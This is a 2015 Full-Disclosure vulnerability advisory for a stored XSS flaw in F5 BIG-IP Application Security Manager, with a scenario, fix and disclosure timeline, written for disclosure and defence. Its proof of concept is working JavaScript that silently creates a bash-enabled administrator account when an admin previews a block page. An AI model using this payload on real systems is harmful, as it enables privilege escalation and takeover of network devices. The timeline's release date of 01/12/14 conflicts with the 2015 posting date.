lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 12 Jan 2015 14:29:15 -0600
From: Peter Lapp <lappsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Stored XSS Vulnerability in F5 BIG-IP Application Security
	Manager

Details
=======

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lappsec@...il.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
=======

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be displayed
to end users when they trigger a violation. The configuration page for the
custom response contains a text input for HTML and a "Show" button that
allows the editor to preview the page. This functionality is vulnerable to
Cross Site Scripting.



Technical Details and POC
=========================

The HTML entered into the "Response Body" area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the context
of the management console whenever a user clicks the "Show" button. The
user could use XHR to bypass CSRF protections and perform commands on
behalf of anyone that clicks the "Show" button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user (see
below) into the "Response Body" input, and saves the page.

2. An admin logs on and previews the block page via the "Show" button.

3. The JS runs in the background, executes the XHR, and adds a new admin
user. The restricted user now has an admin account.

POC (Sloppy, I know):
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
"_timenow="+timenowvalue+"&_timenow_before="+timebeforevalue+"&_bufvalue="+bufvalue+"&_bufvalue_before="+bufvaluebefore+"&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passw
 d_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
postrequest.open("POST", "/tmui/Control/form", true)
postrequest.setRequestHeader("Content-type",
"application/x-www-form-urlencoded")
postrequest.send(parameters)
}
}
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp",
true);
xmlhttp.responseType = "document";
xmlhttp.send();
</script>



Solution
========

Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline
========
06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was
not created and the fix would not be backported.
01/12/14 - Released vulnerability info.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ